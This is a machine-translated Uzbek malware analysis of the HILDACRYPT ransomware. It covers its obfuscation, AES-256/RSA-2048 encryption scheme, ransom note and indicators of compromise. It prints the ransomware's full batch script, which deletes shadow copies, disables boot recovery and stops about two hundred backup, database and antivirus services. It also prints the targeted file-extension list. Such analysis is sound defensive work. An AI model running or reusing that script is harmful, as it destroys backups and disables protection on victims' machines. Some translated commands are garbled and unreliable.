Hey Xabr! Va yana, biz Ransomware toifasidagi zararli dasturlarning so'nggi versiyalari haqida gapiramiz. HILDACRYPT - bu 2019-yil avgust oyida topilgan Hilda oilasining yangi to‘lov dasturi bo‘lib, dasturiy ta’minotni tarqatishda foydalanilgan Netflix multfilmi nomi bilan atalgan. Bugun biz ushbu yangilangan ransomware virusining texnik xususiyatlari bilan tanishamiz.
Hilda ransomware dasturining birinchi versiyasida havola Youtube-da joylashtirilgan
Statik tahlil
To'lov dasturi MS Windows ostida yozilgan PE32 .NET faylida joylashgan. Uning hajmi 135 168 baytni tashkil qiladi. Asosiy dastur kodi ham, himoyachi dastur kodi ham C# da yozilgan. Kompilyatsiya vaqti belgisiga ko'ra, ikkilik 14 yil 2019 sentyabrda yaratilgan.
Detect It Easy ma'lumotlariga ko'ra, to'lov dasturi Confuser va ConfuserEx yordamida arxivlangan, ammo bu obfuscatorlar avvalgidek, faqat ConfuserEx Confuserning vorisi, shuning uchun ularning kod imzolari o'xshash.
HILDACRYPT haqiqatan ham ConfuserEx bilan paketlangan.
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Hujum vektori
Katta ehtimol bilan, to'lov dasturi qonuniy XAMPP dasturi sifatida niqoblangan veb-dasturlash saytlaridan birida topilgan.
Infektsiyaning butun zanjirini ko'rish mumkin
Xiralashish
Ransomware satrlari shifrlangan shaklda saqlanadi. Ishga tushganda, HILDACRYPT ularni Base64 va AES-256-CBC yordamida parolini hal qiladi.
sozlama
Birinchidan, ransomware% AppDataRoaming% da tasodifiy yaratilgan GUID (Globally Unique Identifier) parametri bilan papka yaratadi. Ushbu manzilga .bat faylini qo'shish orqali to'lov dasturi virusi uni cmd.exe yordamida ishga tushiradi:
cmd.exe /c JKfgkgj3hjgfhjka.bat va chiqish
Keyin tizim funksiyalari yoki xizmatlarini o'chirish uchun ommaviy skriptni bajarishni boshlaydi.
Skript soya nusxalarini yo'q qiladigan, SQL Serverni, zaxira nusxalarini va antivirus echimlarini o'chirib qo'yadigan buyruqlarning uzoq ro'yxatini o'z ichiga oladi.
Masalan, Acronis Backup-ning zaxira xizmatlarini to'xtatishga urinish muvaffaqiyatsiz tugadi. Bundan tashqari, u quyidagi ishlab chiqaruvchilarning zaxira tizimlari va antivirus yechimlariga hujum qiladi: Veeam, Sophos, Kaspersky, McAfee va boshqalar.
@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop “Sophos Device Control Service” /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop “Zoolz 2 Service” /y
net stop McTaskManager /y
net stop “Sophos AutoUpdate Service” /y
net stop “Sophos System Protection Service” /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop “Symantec System Recovery” /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop “Sophos Health Service” /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop “Sophos Message Router” /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop “Sophos Clean Service” /y
net stop swi_update_64 /y
net stop “Sophos Web Control Service” /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop “Veeam Backup Catalog Data Service” /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop “Sophos MCS Client” /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop “SQLsafe Backup Service” /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop “Sophos Safestore Service” /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop “Sophos File Scanner Service” /y
net stop “Sophos Agent” /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop “Enterprise Client Service” /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop “SQL Backups” /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop “Sophos MCS Agent” /y
net stop RESvc /y
net stop “Acronis VSS Provider” /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop “SQLsafe Filter Service” /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0
Yuqorida aytib o'tilgan xizmatlar va jarayonlar o'chirilgandan so'ng, kripto shkafi barcha kerakli xizmatlar ishlamay qolganligini ta'minlash uchun vazifalar ro'yxati buyrug'i yordamida barcha ishlaydigan jarayonlar haqida ma'lumot to'playdi.
vazifalar ro'yxati v /fo csv
Bu buyruq bajarilayotgan jarayonlarning batafsil ro'yxatini ko'rsatadi, ularning elementlari "," belgisi bilan ajratiladi.
««csrss.exe»,«448»,«services»,«0»,«1�896 ��»,«unknown»,»�/�»,«0:00:03»,»�/�»»
Ushbu tekshiruvdan so'ng to'lov dasturi shifrlash jarayonini boshlaydi.
Shifrlash
Fayl shifrlash
HILDACRYPT Recycle.Bin va Reference AssembliesMicrosoft papkalaridan tashqari qattiq disklarning barcha topilgan tarkibini kezib chiqadi. Ikkinchisida to'lov dasturiga ta'sir qilishi mumkin bo'lgan .Net ilovalari uchun muhim dll, pdb va hokazo fayllar mavjud. Shifrlanadigan fayllarni qidirish uchun quyidagi kengaytmalar ro'yxati ishlatiladi:
«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»
Ransomware foydalanuvchi fayllarini shifrlash uchun AES-256-CBC algoritmidan foydalanadi. Kalit hajmi 256 bit va ishga tushirish vektori (IV) hajmi 16 bayt.
Quyidagi skrinshotda byte_2 va byte_1 qiymatlari GetBytes() yordamida tasodifiy olingan.
Kalit
VI
Shifrlangan fayl HCY kengaytmasiga ega!.. Bu shifrlangan faylga misol. Yuqorida tilga olingan kalit va IV ushbu fayl uchun yaratilgan.
Kalit shifrlash
Kriptoloker yaratilgan AES kalitini shifrlangan faylda saqlaydi. Shifrlangan faylning birinchi qismida XML formatidagi HILDACRYPT, KEY, IV, FileLen kabi maʼlumotlarni oʻz ichiga olgan sarlavha mavjud va quyidagi koʻrinishga ega:
AES va IV kalitlari RSA-2048 bilan shifrlangan va kodlash Base64 bilan. RSA ochiq kaliti kriptolokerning korpusida XML formatidagi shifrlangan satrlardan birida saqlanadi.
28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB
RSA ochiq kaliti AES fayl kalitini shifrlash uchun ishlatiladi. RSA ochiq kaliti Base64 kodlangan bo'lib, modul va umumiy ko'rsatkich 65537 dan iborat. Shifrni hal qilish uchun tajovuzkorda bo'lgan shaxsiy RSA kaliti talab qilinadi.
RSA shifrlashdan so'ng, AES kaliti shifrlangan faylda saqlangan Base64 yordamida kodlanadi.
To'lov haqida xabar
Shifrlash oxirida HILDACRYPT html faylni fayllarni shifrlagan papkaga yozadi. Ransomware xabarnomasida jabrlanuvchi tajovuzkor bilan bog'lanish uchun foydalanishi mumkin bo'lgan ikkita elektron pochta manzili mavjud.
Tovlamachilik xabarnomasida “No loli is safe;)” – “No loli is safe;)” qatori, Yaponiyada taqiqlangan kichkina qizlarning tashqi ko‘rinishidagi anime va manga qahramonlariga ishora.
xulosa
HILDACRYPT, yangi ransomware oilasi yangi versiyasini chiqardi. Shifrlash modeli jabrlanuvchiga ransomware tomonidan shifrlangan fayllarni shifrlashdan saqlaydi. Kriptoloker zaxira tizimlari va antivirus yechimlari bilan bog'liq himoya xizmatlarini o'chirish uchun faol himoya usullaridan foydalanadi. HILDACRYPT muallifi Netflix Hilda animatsion seriyasining muxlisi bo'lib, uning treyleri dasturning oldingi versiyasini qaytarib olish xatiga kiritilgan.
Odatdagidek,
Murosaga kelish ko'rsatkichlari
Fayl kengaytmasi HCY!
HILDACRYPTreadMe.html
xamp.exe bitta "p" bilan va raqamli imzosiz
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Manba: www.habr.com